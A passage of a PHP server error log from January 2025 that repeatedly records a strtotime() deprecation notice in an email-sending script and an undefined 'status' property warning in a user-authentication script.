UTC] PHP Deprecated: strtotime(): Passing null to parameter #1 ($datetime) of type string is deprecated in /home/emeraadmin/public_html/pages/send_email_to_workers.php on line 98 [20-Jan-2025 02:20:45 UTC] PHP Deprecated: strtotime(): Passing null to parameter #1 ($datetime) of type string is deprecated in /home/emeraadmin/public_html/pages/send_email_to_workers.php on line 98 [20-Jan-2025 03:31:15 UTC] PHP Warning: Undefined property: stdClass::$status in /home/emeraadmin/public_html/pages/authenticateuser.php on line 19 [20-Jan-2025 03:58:26 UTC] PHP Warning: Undefined property: stdClass::$status in /home/emeraadmin/public_html/pages/authenticateuser.php on line 19 [20-Jan-2025 03:59:18 UTC] PHP Deprecated: strtotime(): Passing null to parameter #1 ($datetime) of type string is deprecated in /home/emeraadmin/public_html/pages/send_email_to_workers.php on line 98 [20-Jan-2025 03:59:44 UTC] PHP Warning: Undefined property: stdClass::$status in /home/emeraadmin/public_html/pages/authenticateuser.php on line 19 [20-Jan-2025 04:00:21 UTC] PHP Deprecated: strtotime(): Passing null to parameter #1 ($datetime) of type string is deprecated in /home/emeraadmin/public_html/pages/send_email_to_workers.php on line 98 [20-Jan-2025 04:13:15 UTC] PHP Warning: Undefined property: stdClass::$status in /home/emeraadmin/public_html/pages/authenticateuser.php on line 19 [20-Jan-2025 04:21:52 UTC] PHP Warning: Undefined property: stdClass::$status in /home/emeraadmin/public_html/pages/authenticateuser.php on line 19 [20-Jan-2025 04:38:55 UTC] PHP Deprecated: strtotime(): Passing null to parameter #1 ($datetime) of type string is deprecated in /home/emeraadmin/public_html/pages/send_email_to_workers.php on line 98 [20-Jan-2025 04:39:07 UTC] PHP Deprecated: strtotime(): Passing null to parameter #1 ($datetime) of type string is deprecated in /home/emeraadmin/public_html/pages/send_email_to_workers.php on line 98 [20-Jan-2025 04:43:44 UTC] PHP Deprecated: strtotime(): Passing null to parameter #1 ($datetime) of type string is deprecated in /home/emeraadmin/public_html/pages/send_email_to_workers.php on line 98 [20-Jan-2025 04:44:20 UTC] PHP Deprecated: strtotime(): Passing null to parameter #1 ($datetime) of type string is deprecated in /home/emeraadmin/public_html/pages/send_email_to_workers.php on line 98 [20-Jan-2025 04:44:31 UTC] PHP Deprecated: strtotime(): Passing null to parameter #1 ($datetime) of type string is deprecated in /home/emeraadmin/public_html/pages/send_email_to_workers.php on line 98 [20-Jan-2025 04:44:56 UTC] PHP Deprecated: strtotime(): Passing null to parameter #1 ($datetime) of type string is deprecated in /home/emeraadmin/public_html/pages/send_email_to_workers.php on line 98 [20-Jan-2025 04:56:53 UTC] PHP Deprecated: strtotime(): Passing null to parameter #1 ($datetime) of type string is deprecated in /home/emeraadmin/public_html/pages/send_email_to_workers.php on line 98 [20-Jan-2025 04:57:16 UTC] PHP Deprecated: strtotime(): Passing null to parameter #1 ($datetime) of type string is deprecated in /home/emeraadmin/public_html/pages/send_email_to_workers.php on line 98 [20-Jan-2025 04:57:35 UTC] PHP Deprecated: strtotime(): Passing null to parameter #1 ($datetime) of type string is deprecated in /home/emeraadmin/public_html/pages/send_email_to_workers.php on line 98 [20-Jan-2025 05:00:25 UTC] PHP Deprecated: strtotime(): Passing null to parameter #1 ($datetime) of type string is deprecated in /home/emeraadmin/public_html/pages/send_email_to_workers.php on line 98 [20-Jan-2025 05:00:46 UTC] PHP Deprecated: strtotime(): Passing null to parameter #1 ($datetime) of type string is deprecated in /home/emeraadmin/public_html/pages/send_email_to_workers.php on line 98 [20-Jan-2025 05:18:45 UTC] PHP Deprecated: strtotime(): Passing null to parameter #1 ($datetime) of type string is deprecated in /home/emeraadmin/public_html/pages/send_email_to_workers.php on line 98 [20-Jan-2025 05:19:08 UTC] PHP Deprecated: strtotime(): Passing null to parameter #1 ($datetime) of type string is deprecated in /home/emeraadmin/public_html/pages/send_email_to_workers.php on line 98 [20-Jan-2025 05:20:34 UTC] PHP Deprecated: strtotime(): Passing null to parameter #1 ($datetime) of type string is deprecated in /home/emeraadmin/public_html/pages/send_email_to_workers.php on line 98 [20-Jan-2025 05:20:45 UTC] PHP Deprecated: strtotime(): Passing null to parameter #1 ($datetime) of type string is deprecated in /home/emeraadmin/public_html/pages/send_email_to_workers.php on line 98 [20-Jan-2025 05:29:58 UTC] PHP Deprecated: strtotime(): Passing null to parameter #1 ($datetime) of type string is deprecated in /home/emeraadmin/public_html/pages/send_email_to_workers.php on line 98 [20-Jan-2025 05:30:46 UTC] PHP Warning: Undefined property: stdClass::$status in /home/emeraadmin/public_html/pages/authenticateuser.php on line 19 [20-Jan-2025 05:41:28 UTC] PHP Warning: Undefined property: stdClass::$status in /home/emeraadmin/public_html/pages/authenticateuser.php on line 19 [20-Jan-2025 05:41:29 UTC] PHP Warning: Undefined property: stdClass::$status in /home/emeraadmin/public_html/pages/authenticateuser.php on line 19 [20-Jan-2025 07:10:33 UTC] PHP Warning: Undefined property: stdClass::$status in /home/emeraadmin/public_html/pages/authenticateuser.php on line 19 [20-Jan-2025 10:30:09 UTC] PHP Warning: Undefined property: stdClass::$status in /home/emeraadmin/public_html/pages/authenticateuser.php on line 19 [20-Jan-2025 10:30:47 UTC] PHP Deprecated: strtotime(): Passing null to parameter #1 ($datetime) of type string is deprecated in /home/emeraadmin/public_html/pages/send_email_to_workers.php on line 98 [20-Jan-2025 10:30:58 UTC] PHP Deprecated: strtotime(): Passing null to parameter #1 ($datetime) of type string is deprecated in /home/emeraadmin/public_html/pages/send_email_to_workers.php on line 98 [20-Jan-2025 10:31:09 UTC] PHP Deprecated: strtotime(): Passing null to parameter #1 ($datetime) of type string is deprecated in /home/emeraadmin/public_html/pages/send_email_to_workers.php on line 98 [20-Jan-2025 10:31:19 UTC] PHP Deprecated: strtotime(): Passing null to parameter #1 ($datetime) of type string is deprecated in /home/emeraadmin/public_html/pages/send_email_to_workers.php on line 98 [20-Jan-2025 10:31:30 UTC] PHP Deprecated: strtotime(): Passing null to parameter #1 ($datetime) of type string is deprecated in /home/emeraadmin/public_html/pages/send_email_to_workers.php on line 98 [20-Jan-2025 10:31:53 UTC] PHP Deprecated: strtotime(): Passing null to parameter #1 ($datetime) of type string is deprecated in /home/emeraadmin/public_html/pages/send_email_to_workers.php on line 98 [20-Jan-2025 21:32:38 UTC] PHP Warning: Undefined property: stdClass::$status in /home/emeraadmin/public_html/pages/authenticateuser.php on line 19 [20-Jan-2025 23:00:43 UTC] PHP Warning: Undefined property: stdClass::$status in /home/emeraadmin/public_html/pages/authenticateuser.php on line 19 [21-Jan-2025 00:29:29 UTC] PHP Warning: Undefined property: stdClass::$status in /home/emeraadmin/public_html/pages/authenticateuser.php on line 19 [21-Jan-2025 00:50:31 UTC] PHP Warning: Undefined property: stdClass::$status in /home/emeraadmin/public_html/pages/authenticateuser.php on line 19 [21-Jan-2025 00:51:22 UTC] PHP Warning: Undefined property: stdClass::$status in /home/emeraadmin/public_html/pages/authenticateuser.php on line 19 [21-Jan-2025 00:54:27 UTC] PHP Deprecated: strtotime(): Passing null to parameter #1 ($datetime) of type string is deprecated in /home/emeraadmin/public_html/pages/send_email_to_workers.php on line 98 [21-Jan-2025 01:00:27 UTC] PHP Warning: Undefined property: stdClass::$status in /home/emeraadmin/public_html/pages/authenticateuser.php on line 19 [21-Jan-2025 02:23:49 UTC] PHP Warning: Undefined property: stdClass::$status in /home/emeraadmin/public_html/pages/authenticateuser.php on line 19 [21-Jan-2025 02:53:43 UTC] PHP Warning: Undefined property: stdClass::$status in /home/emeraadmin/public_html/pages/authenticateuser.php on line 19 [21-Jan-2025 02:55:19 UTC] PHP Deprecated: strtotime(): Passing null to parameter #1 ($datetime) of type string is deprecated in /home/emeraadmin/public_html/pages/send_email_to_workers.php on line 98 [21-Jan-2025 02:55:32 UTC] PHP Deprecated: strtotime(): Passing null to parameter #1 ($datetime) of type string is deprecated in /home/emeraadmin/public_html/pages/send_email_to_workers.php on line 98 [21-Jan-2025 02:55:42 UTC] PHP Deprecated: strtotime(): Passing null to parameter #1 ($datetime) of type string is deprecated in /home/emeraadmin/public_html/pages/send_email_to_workers.php on line 98 [21-Jan-2025 03:32:41 UTC] PHP Warning: Undefined property: stdClass::$status in /home/emeraadmin/public_html/pages/authenticateuser.php on line 19 [21-Jan-2025 03:39:55 UTC] PHP Warning: Undefined property: stdClass::$status in /home/emeraadmin/public_html/pages/authenticateuser.php on line 19 [21-Jan-2025 04:15:30 UTC] PHP Warning: Undefined property: stdClass::$status in /home/emeraadmin/public_html/pages/authenticateuser.php on line 19 [21-Jan-2025 04:21:43 UTC] PHP Warning: Undefined property: stdClass::$status in /home/emeraadmin/public_html/pages/authenticateuser.php on line 19 [21-Jan-2025 04:42:37 UTC] PHP Warning: Undefined property: stdClass::$status in /home/emeraadmin/public_html/pages/authenticateuser.php on line 19 [21-Jan-2025 05:19:55 UTC] PHP Warning: Undefined property: stdClass::$status in /home/emeraadmin/public_html/pages/authenticateuser.php on line 19 [21-Jan-2025 05:32:19 UTC] PHP Warning: Undefined property: stdClass::$status in /home/emeraadmin/public_html/pages/authenticateuser.php on line 19 [21-Jan-2025 05:36:14 UTC] PHP Warning: Undefined property: stdClass::$status in /home/emeraadmin/public_html/pages/authenticateuser.php on line 19 [21-Jan-2025 06:44:37 UTC] PHP Warning: Undefined property: stdClass::$status in /home/emeraadmin/public_html/pages/authenticateuser.php on line 19 [21-Jan-2025 07:31:43 UTC] PHP Warning: Undefined property: stdClass::$status in /home/emeraadmin/public_html/pages/authenticateuser.php on line 19 [21-Jan-2025 11:25:18 UTC] PHP Warning: Undefined property: stdClass::$status in /home/emeraadmin/public_html/pages/authenticateuser.php on line 19 [21-Jan-2025 11:25:45 UTC] PHP Deprecated: strtotime(): Passing null to parameter #1 ($datetime) of type string is deprecated in /home/emeraadmin/public_html/pages/send_email_to_workers.php on line 98 [21-Jan-2025 11:25:53 UTC] PHP Deprecated: strtotime(): Passing null to parameter #1 ($datetime) of type string is deprecated in /home/emeraadmin/public_html/pages/send_email_to_workers.php on line 98 [21-Jan-2025 11:26:02 UTC] PHP Deprecated: strtotime(): Passing null to parameter #1 ($datetime) of type string is deprecated in /home/emeraadmin/public_html/pages/send_email_to_workers.php on line 98 [21-Jan-2025 11:26:09 UTC] PHP Deprecated: strtotime(): Passing null to parameter #1 ($datetime) of type string is deprecated in /home/emeraadmin/public_html/pages/send_email_to_workers.php on line 98 [21-Jan-2025 11:26:23 UTC] PHP Deprecated: strtotime(): Passing null to parameter #1 ($datetime) of type string is deprecated in /home/emeraadmin/public_html/pages/send_email_to_workers.php on line 98 [21-Jan-2025 11:27:00 UTC] PHP Deprecated: strtotime(): Passing null to parameter #1 ($datetime) of type string is deprecated in /home/emeraadmin/public_html/pages/send_email_to_workers.php on line 98 [21-Jan-2025 11:27:51 UTC] PHP Deprecated: strtotime(): Passing null to parameter #1 ($datetime) of type string is deprecated in /home/emeraadmin/public_html/pages/send_email_to_workers.php on line 98 [21-Jan-2025 11:28:13 UTC] PHP Deprecated: strtotime(): Passing null to parameter #1 ($datetime) of type string is deprecated in /home/emeraadmin/public_html/pages/send_email_to_workers.php on line 98 [21-Jan-2025 11:28:20 UTC] PHP Deprecated: strtotime(): Passing null to parameter #1 ($datetime) of type string is deprecated in /home/emeraadmin/public_html/pages/send_email_to_workers.php on line 98 [21-Jan-2025 11:28:29 UTC] PHP Deprecated: strtotime(): Passing null to parameter #1 ($datetime) of type string is deprecated in /home/emeraadmin/public_html/pages/send_email_to_workers.php on line 98 [21-Jan-2025 11:28:37 UTC] PHP Deprecated: strtotime(): Passing null to parameter #1 ($datetime) of type string is deprecated in /home/emeraadmin/public_html/pages/send_email_to_workers.php on line 98 [21-Jan-2025 11:28:47 UTC] PHP Deprecated: strtotime(): Passing null to parameter #1 ($datetime) of type string is deprecated in /home/emeraadmin/public_html/pages/send_email_to_workers.php on line 98 [21-Jan-2025 11:28:56 UTC] PHP Deprecated: strtotime(): Passing null to parameter #1 ($datetime) of type string is deprecated in /home/emeraadmin/public_html/pages/send_email_to_workers.php on line 98 [21-Jan-2025 11:29:05 UTC] PHP Deprecated: strtotime(): Passing null to parameter #1 ($datetime) of type string is deprecated in /home/emeraadmin/public_html/pages/send_email_to_workers.php on line 98 [21-Jan-2025 11:29:14 UTC] PHP Deprecated: strtotime(): Passing null to parameter #1 ($datetime) of type string is deprecated in /home/emeraadmin/public_html/pages/send_email_to_workers.php on line 98 [21-Jan-2025 11:29:21 UTC] PHP Deprecated: strtotime(): Passing null to parameter #1 ($datetime) of type string is deprecated in /home/emeraadmin/public_html/pages/send_email_to_workers.php on line 98 [21-Jan-2025 11:29:28 UTC] PHP Deprecated: strtotime(): Passing null to parameter #1 ($datetime) of type string is deprecated in /home/emeraadmin/public_html/pages/send_email_to_workers.php on line 98 [21-Jan-2025 11:29:37 UTC] PHP Deprecated: strtotime(): Passing null to parameter #1 ($datetime) of type string is deprecated in /home/emeraadmin/public_html/pages/send_email_to_workers.php on line 98 [21-Jan-2025 11:29:48 UTC] PHP Deprecated: strtotime(): Passing null to parameter #1 ($datetime) of type string is deprecated in /home/emeraadmin/public_html/pages/send_email_to_workers.php on line 98 [21-Jan-2025 11:29:58 UTC] PHP Deprecated: strtotime(): Passing null to parameter #1 ($datetime) of type string is deprecated in /home/emeraadmin/public_html/pages/send_email_to_workers.php on line 98 [21-Jan-2025 11:30:06 UTC] PHP Deprecated: strtotime(): Passing null to parameter #1 ($datetime) of type string is deprecated in /home/emeraadmin/public_html/pages/send_email_to_workers.php on line 98 [21-Jan-2025 11:31:28 UTC] PHP Deprecated: strtotime(): Passing null to parameter #1 ($datetime) of type string is deprecated in /home/emeraadmin/public_html/pages/send_email_to_workers.php on line 98 [21-Jan-2025 11:31:37 UTC] PHP Deprecated: strtotime(): Passing null to parameter #1 ($datetime) of type string is deprecated in /home/emeraadmin/public_html/pages/send_email_to_workers.php on line 98 [21-Jan-2025 11:42:36 UTC] PHP Warning: Undefined property: stdClass::$status in /home/emeraadmin/public_html/pages/authenticateuser.php on line 19 [21-Jan-2025 11:43:12 UTC] PHP Deprecated: strtotime(): Passing null to parameter #1 ($datetime) of type string is deprecated in /home/emeraadmin/public_html/pages/send_email_to_workers.php on line 98 [21-Jan-2025 11:46:58 UTC] PHP Deprecated: strtotime(): Passing null to parameter #1 ($datetime) of type string is deprecated in /home/emeraadmin/public_html/pages/send_email_to_workers.php on line 98 [21-Jan-2025 11:47:31 UTC] PHP Deprecated: strtotime(): Passing null to parameter #1 ($datetime) of type string is deprecated in /home/emeraadmin/public_html/pages/send_email_to_workers.php on line 98 [21-Jan-2025 11:48:02 UTC] PHP Deprecated: strtotime(): Passing null to parameter #1 ($datetime) of type string is deprecated in /home/emeraadmin/public_html/pages/send_email_to_workers.php on line 98 [21-Jan-2025 11:48:20 UTC] PHP Deprecated: strtotime(): Passing null to parameter #1 ($datetime) of type string is deprecated in /home/emeraadmin/public_html/pages/send_email_to_workers.php on line 98 [21-Jan-2025 11:49:46 UTC] PHP Deprecated: strtotime(): Passing null to parameter #1 ($datetime) of type string is deprecated in /home/emeraadmin/public_html/pages/send_email_to_workers.php on line 98 [21-Jan-2025 11:50:08 UTC] PHP Deprecated: strtotime(): Passing null to parameter #1 ($datetime) of type string is deprecated in /home/emeraadmin/public_html/pages/send_email_to_workers.php on line 98 [21-Jan-2025 11:50:21 UTC] PHP Deprecated: strtotime(): Passing null to parameter #1 ($datetime) of type string is deprecated in /home/emeraadmin/public_html/pages/send_email_to_workers.php on line 98 [21-Jan-2025 22:38:59 UTC] PHP Warning: Undefined property: stdClass::$status in /home/emeraadmin/public_html/pages/authenticateuser.php on line 19 [21-Jan-2025 22:39:27 UTC] PHP Deprecated: strtotime(): Passing null to parameter #1 ($datetime) of type string is deprecated in /home/emeraadmin/public_html/pages/send_email_to_workers.php on line 98 [21-Jan-2025 22:39:38 UTC] PHP Deprecated: strtotime(): Passing null to parameter #1 ($datetime) of type string is deprecated in /home/emeraadmin/public_html/pages/send_email_to_workers.php on line 98 [21-Jan-2025 22:39:49 UTC] PHP Deprecated: strtotime(): Passing null to parameter #1 ($datetime) of type string is deprecated in /home/emeraadmin/public_html/pages/send_email_to_workers.php on line 98 [21-Jan-2025 22:40:01 UTC] PHP Deprecated: strtotime(): Passing null to parameter #1 ($datetime) of type string is deprecated in /home/emeraadmin/public_html/pages/send_email_to_workers.php on line 98 [21-Jan-2025 22:40:10 UTC] PHP Deprecated: strtotime(): Passing null to parameter #1 ($datetime) of type string is deprecated in /home/emeraadmin/public_html/pages/send_email_to_workers.php on line 98 [21-Jan-2025 22:40:21 UTC] PHP Deprecated: strtotime(): Passing null to parameter #1 ($datetime) of type string is deprecated in /home/emeraadmin/public_html/pages/send_email_to_workers.php on line 98 [21-Jan-2025 23:25:58 UTC] PHP Warning: Undefined property: stdClass::$status in /home/emeraadmin/public_html/pages/authenticateuser.php on line 19 [22-Jan-2025 00:04:35 UTC] PHP Warning: Undefined property: stdClass::$status in /home/emeraadmin/public_html/pages/authenticateuser.php on line 19 [22-Jan-2025 00:04:35 UTC] PHP Warning: Undefined property: stdClass::$status in /home/emeraadmin/public_html/pages/authenticateuser.php on line 19 [22-Jan-2025 00:40:12 UTC] PHP Warning: Undefined property: stdClass::$status in /home/emeraadmin/public_html/pages/authenticateuser.php on line 19 [22-Jan-2025 00:42:55 UTC] PHP Deprecated: strtotime(): Passing null to parameter #1 ($datetime) of type string is deprecated in /home/emeraadmin/public_html/pages/send_email_to_workers.php on line 98 [22-Jan-2025 00:43:08 UTC] PHP Deprecated: strtotime(): Passing null to parameter #1 ($datetime) of type string is deprecated in /home/emeraadmin/public_html/pages/send_email_to_workers.php on line 98 [22-Jan-2025 01:00:04 UTC] PHP Warning: Undefined property: stdClass::$status in /home/emeraadmin/public_html/pages/authenticateuser.php on line 19 [22-Jan-2025 01:07:01 UTC] PHP Warning: Undefined property: stdClass::$status in /home/emeraadmin/public_html/pages/authenticateuser.php on line 19 [22-Jan-2025 01:07:18 UTC] PHP Deprecated: strtotime(): Passing null to parameter #1 ($datetime) of type string is deprecated in /home/emeraadmin/public_html/pages/send_email_to_workers.php on line 98 [22-Jan-2025 01:29:36 UTC] PHP Warning: Undefined property: stdClass::$status in /home/emeraadmin/public_html/pages/authenticateuser.php on line 19 [22-Jan-2025 02:42:26 UTC] PHP Warning: Undefined property: stdClass::$status in /home/emeraadmin/public_html/pages/authenticateuser.php on line 19 [22-Jan-2025 02:58:33 UTC] PHP Warning: Undefined property: stdClass::$status in /home/emeraadmin/public_html/pages/authenticateuser.php on line 19 [22-Jan-2025 03:30:42 UTC] PHP Warning: Undefined property: stdClass::$status in /home/emeraadmin/public_html/pages/authenticateuser.php on line 19 [22-Jan-2025 04:00:03 UTC] PHP Warning: Undefined property: stdClass::$status in /home/emeraadmin/public_html/pages/authenticateuser.php on line 19 [22-Jan-2025 04:01:43 UTC] PHP Warning: Undefined property: stdClass::$status in /home/emeraadmin/public_html/pages/authenticateuser.php on line 19 [22-Jan-2025 04:02:13 UTC] PHP Deprecated: strtotime(): Passing null to parameter #1 ($datetime) of type string is deprecated in /home/emeraadmin/public_html/pages/send_email_to_workers.php on line 98 [22-Jan-2025 04:18:53 UTC] PHP Deprecated: strtotime(): Passing null to parameter #1 ($datetime) of type string is deprecated in /home/emeraadmin/public_html/pages/send_email_to_workers.php on line 98 [22-Jan-2025 04:49:48 UTC] PHP Deprecated: strtotime(): Passing null to parameter #1 ($datetime) of type string is deprecated in /home/emeraadmin/public_html/pages/send_email_to_workers.php on line 98 [22-Jan-2025 04:51:31 UTC] PHP Deprecated: strtotime(): Passing null to parameter #1 ($datetime) of type string is deprecated in /home/emeraadmin/public_html/pages/send_email_to_workers.php on line 98 [22-Jan-2025 04:51:54 UTC] PHP Deprecated: strtotime(): Passing null to parameter #1 ($datetime) of type string is deprecated in /home/emeraadmin/public_html/pages/send_email_to_workers.php on line 98 [22-Jan-2025 04:52:36 UTC] PHP Deprecated: strtotime(): Passing null to parameter #1 ($datetime) of type string is deprecated in /home/emeraadmin/public_html/pages/send_email_to_workers.php on line 98 [22-Jan-2025 04:54:14 UTC] PHP Deprecated: strtotime(): Passing null to parameter #1 ($datetime) of type string is deprecated in /home/emeraadmin/public_html/pages/send_email_to_workers.php on line 98 [22-Jan-2025 04:54:42 UTC] PHP Deprecated: strtotime(): Passing null to parameter #1 ($datetime) of type string is deprecated in /home/emeraadmin/public_html/pages/send_email_to_workers.php on line 98 [22-Jan-2025 04:54:57 UTC] PHP Deprecated: strtotime(): Passing null to parameter #1 ($datetime) of type string is deprecated in /home/emeraadmin/public_html/pages/send_email_to_workers.php on line 98 [22-Jan-2025 04:55:14 UTC] PHP Deprecated: strtotime(): Passing null to parameter #1 ($datetime) of type string is deprecated in /home/emeraadmin/public_html/pages/send_email_to_workers.php on line 98 [22-Jan-2025 05:13:31 UTC] PHP Warning: Undefined property: stdClass::$status in /home/emeraadmin/public_html/pages/authenticateuser.php on line 19 [22-Jan-2025 05:13:31 UTC] PHP Warning: Undefined property: stdClass::$status in /home/emeraadmin/public_html/pages/authenticateuser.php on line 19 [22-Jan-2025 05:25:52 UTC] PHP Warning: Undefined property: stdClass::$status in /home/emeraadmin/public_html/pages/authenticateuser.php on line 19 [22-Jan-2025 05:25:57 UTC] PHP Deprecated: strtotime(): Passing null to parameter #1 ($datetime) of type string is deprecated in /home/emeraadmin/public_html/pages/send_email_to_workers.php on line 98 [22-Jan-2025 05:26:10 UTC] PHP Deprecated: strtotime(): Passing null to parameter #1 ($datetime) of type string is deprecated in /home/emeraadmin/public_html/pages/send_email_to_workers.php on line 98 [22-Jan-2025 05:26:32 UTC] PHP Deprecated: strtotime(): Passing null to parameter #1 ($datetime) of type string is deprecated in /home/emeraadmin/public_html/pages/send_email_to_workers.php on line 98 [22-Jan-2025 07:16:55 UTC] PHP Warning: Undefined property: stdClass::$status in /home/emeraadmin/public_html/pages/authenticateuser.php on line 19 [22-Jan-2025 12:30:29 UTC] PHP Warning: Undefined property: stdClass::$status in /home/emeraadmin/public_html/pages/authenticateuser.php on line 19 [22-Jan-2025 12:31:46 UTC] PHP Deprecated: strtotime(): Passing null to parameter #1 ($datetime) of type string is deprecated in /home/emeraadmin/public_html/pages/send_email_to_workers.php on line 98 [22-Jan-2025 12:32:10 UTC] PHP Deprecated: strtotime(): Passing null to parameter #1 ($datetime) of type string is deprecated in /home/emeraadmin/public_html/pages/send_email_to_workers.php on line 98 [22-Jan-2025 12:32:32 UTC] PHP Deprecated: strtotime(): Passing null to parameter #1 ($datetime) of type string is deprecated in /home/emeraadmin/public_html/pages/send_email_to_workers.php on line 98 [22-Jan-2025 12:32:53 UTC] PHP Deprecated: strtotime(): Passing null to parameter #1 ($datetime) of type string is deprecated in /home/emeraadmin/public_html/pages/send_email_to_workers.php on line 98 [22-Jan-2025 12:33:15 UTC] PHP Deprecated: strtotime(): Passing null to parameter #1 ($datetime) of type string is deprecated in /home/emeraadmin/public_html/pages/send_email_to_workers.php on line 98 [22-Jan-2025 12:33:29 UTC] PHP Deprecated: strtotime(): Passing null to parameter #1 ($datetime) of type string is deprecated in /home/emeraadmin/public_html/pages/send_email_to_workers.php on line 98 [22-Jan-2025 12:33:40 UTC] PHP Deprecated: strtotime(): Passing null to parameter #1 ($datetime) of type string is deprecated in /home/emeraadmin/public_html/pages/send_email_to_workers.php on line 98 [22-Jan-2025 12:34:03 UTC] PHP Deprecated: strtotime(): Passing null to parameter #1 ($datetime) of type string is deprecated in /home/emeraadmin/public_html/pages/send_email_to_workers.php on line 98 [22-Jan-2025 12:34:32 UTC] PHP Deprecated: strtotime(): Passing null to parameter #1 ($datetime) of type string is deprecated in /home/emeraadmin/public_html/pages/send_email_to_workers.php on line 98 [22-Jan-2025 12:35:21 UTC] PHP Deprecated: strtotime(): Passing null to parameter #1 ($datetime) of type string is deprecated in /home/emeraadmin/public_html/pages/send_email_to_workers.php on line 98 [22-Jan-2025 13:31:23 UTC] PHP Warning: Undefined property: stdClass::$status in /home/emeraadmin/public_html/pages/authenticateuser.php on line 19 [22-Jan-2025 16:24:44 UTC] PHP Warning: Undefined property: stdClass::$status in /home/emeraadmin/public_html/pages/authenticateuser.php on line 19 [22-Jan-2025 21:27:27 UTC] PHP Warning: Undefined property: stdClass::$status in /home/emeraadmin/public_html/pages/authenticateuser.php on line 19 [22-Jan-2025 22:06:55 UTC] PHP Warning: Undefined property: stdClass::$status in /home/emeraadmin/public_html/pages/authenticateuser.php on line 19 [22-Jan-2025 22:10:51 UTC] PHP Warning: Undefined property: stdClass::$status in /home/emeraadmin/public_html/pages/authenticateuser.php on line 19 [22-Jan-2025 22:11:16 UTC] PHP Deprecated: strtotime(): Passing null to parameter #1 ($datetime) of type string is deprecated in /home/emeraadmin/public_html/pages/send_email_to_workers.php on line 98 [22-Jan-2025 22:11:20 UTC] PHP Warning: Undefined property: stdClass::$status in /home/emeraadmin/public_html/pages/authenticateuser.php on line 19 [22-Jan-2025 22:11:25 UTC] PHP Deprecated: strtotime(): Passing null to parameter #1 ($datetime) of type string is deprecated in /home/emeraadmin/public_html/pages/send_email_to_workers.php on line 98 [22-Jan-2025 22:11:35 UTC] PHP Deprecated: strtotime(): Passing null to parameter #1 ($datetime) of type string is deprecated in /home/emeraadmin/public_html/pages/send_email_to_workers.php on line 98 [22-Jan-2025 22:17:15 UTC] PHP Warning: Undefined property: stdClass::$status in /home/emeraadmin/public_html/pages/authenticateuser.php on line 19 [22-Jan-2025 22:19:57 UTC] PHP Deprecated: strtotime(): Passing null to parameter #1 ($datetime) of type string is deprecated in /home/emeraadmin/public_html/pages/send_email_to_workers.php on line 98 [22-Jan-2025 22:20:09 UTC] PHP Deprecated: strtotime(): Passing null to parameter #1 ($datetime) of type string is deprecated in /home/emeraadmin/public_html/pages/send_email_to_workers.php on line 98 [22-Jan-2025 22:20:25 UTC] PHP Deprecated: strtotime(): Passing null to parameter #1 ($datetime) of type string is deprecated in /home/emeraadmin/public_html/pages/send_email_to_workers.php on line 98 [22-Jan-2025 22:21:08 UTC] PHP Deprecated: strtotime(): Passing null to parameter #1 ($datetime) of type string is deprecated in /home/emeraadmin/public_html/pages/send_email_to_workers.php on line 98 [22-Jan-2025 22:36:09 UTC] PHP Warning: Undefined property: stdClass::$status in /home/emeraadmin/public_html/pages/authenticateuser.php on line 19 [22-Jan-2025 22:40:14 UTC] PHP Warning: Undefined property: stdClass::$status in /home/emeraadmin/public_html/pages/authenticateuser.php on line 19 [22-Jan-2025 23:05:29 UTC] PHP Deprecated: strtotime(): Passing null to parameter #1 ($datetime) of type string is deprecated in /home/emeraadmin/public_html/pages/send_email_to_workers.php on line 98 [22-Jan-2025 23:31:50 UTC] PHP Warning: Undefined property: stdClass::$status in /home/emeraadmin/public_html/pages/authenticateuser.php on line 19 [22-Jan-2025 23:43:36 UTC] PHP Warning: Undefined property: stdClass::$status in /home/emeraadmin/public_html/pages/authenticateuser.php on line 19 [22-Jan-2025 23:48:46 UTC] PHP Warning: Undefined property: stdClass::$status in /home/emeraadmin/public_html/pages/authenticateuser.php on line 19 [22-Jan-2025 23:50:07 UTC] PHP Warning: Undefined property: stdClass::$status in /home/emeraadmin/public_html/pages/authenticateuser.php on line 19 [22-Jan-2025 23:51:02 UTC] PHP Warning: Undefined property: stdClass::$status in /home/emeraadmin/public_html/pages/authenticateuser.php on line 19 [23-Jan-2025 01:04:22 UTC] PHP Warning: Undefined property: stdClass::$status in /home/emeraadmin/public_html/pages/authenticateuser.php on line 19 [23-Jan-2025 01:34:22 UTC] PHP Warning: Undefined property: stdClass::$status in /home/emeraadmin/public_html/pages/authenticateuser.php on line 19 [23-Jan-2025 01:49:20 UTC] PHP Warning: Undefined property: stdClass::$status in /home/emeraadmin/public_html/pages/authenticateuser.php on line 19 [23-Jan-2025 03:01:23 UTC] PHP Warning: Undefined property: stdClass::$status in /home/emeraadmin/public_html/pages/authenticateuser.php on line 19 [23-Jan-2025 03:09:40 UTC] PHP Warning: Undefined property: stdClass::$status in /home/emeraadmin/public_html/pages/authenticateuser.php on line 19 [23-Jan-2025 03:13:26 UTC] PHP Deprecated: strtotime(): Passing null to parameter #1 ($datetime) of type string is deprecated in /home/emeraadmin/public_html/pages/send_email_to_workers.php on line 98 [23-Jan-2025 03:31:31 UTC] PHP Warning: Undefined property: stdClass::$status in /home/emeraadmin/public_html/pages/authenticateuser.php on line 19 [23-Jan-2025 04:34:46 UTC] PHP Warning: Undefined property: stdClass::$status in /home/emeraadmin/public_html/pages/authenticateuser.php on line 19 [23-Jan-2025 04:34:46 UTC] PHP Warning: Undefined property: stdClass::$status in /home/emeraadmin/public_html/pages/authenticateuser.php on line 19 [23-Jan-2025 05:30:48 UTC] PHP Warning: Undefined property: stdClass::$status in /home/emeraadmin/public_html/pages/authenticateuser.php on line 19 [23-Jan-2025 06:25:33 UTC] PHP Warning: Undefined property: stdClass::$status in /home/emeraadmin/public_html/pages/authenticateuser.php on line 19 [23-Jan-2025 07:25:27 UTC] PHP Warning: Undefined property: stdClass::$status in /home/emeraadmin/public_html/pages/authenticateuser.php on line 19 [23-Jan-2025 09:29:48 UTC] PHP Warning: Undefined property: stdClass::$status in /home/emeraadmin/public_html/pages/authenticateuser.php on line 19 [23-Jan-2025 09:30:31 UTC] PHP Deprecated: strtotime(): Passing null to parameter #1 ($datetime) of type string is deprecated in /home/emeraadmin/public_html/pages/send_email_to_workers.php on line 98 [23-Jan-2025 09:30:46 UTC] PHP Deprecated: strtotime(): Passing null to parameter #1 ($datetime) of type string is deprecated in /home/emeraadmin/public_html/pages/send_email_to_workers.php on line 98 [23-Jan-2025 09:31:03 UTC] PHP Deprecated: strtotime(): Passing null to parameter #1 ($datetime) of type string is deprecated in /home/emeraadmin/public_html/pages/send_email_to_workers.php on 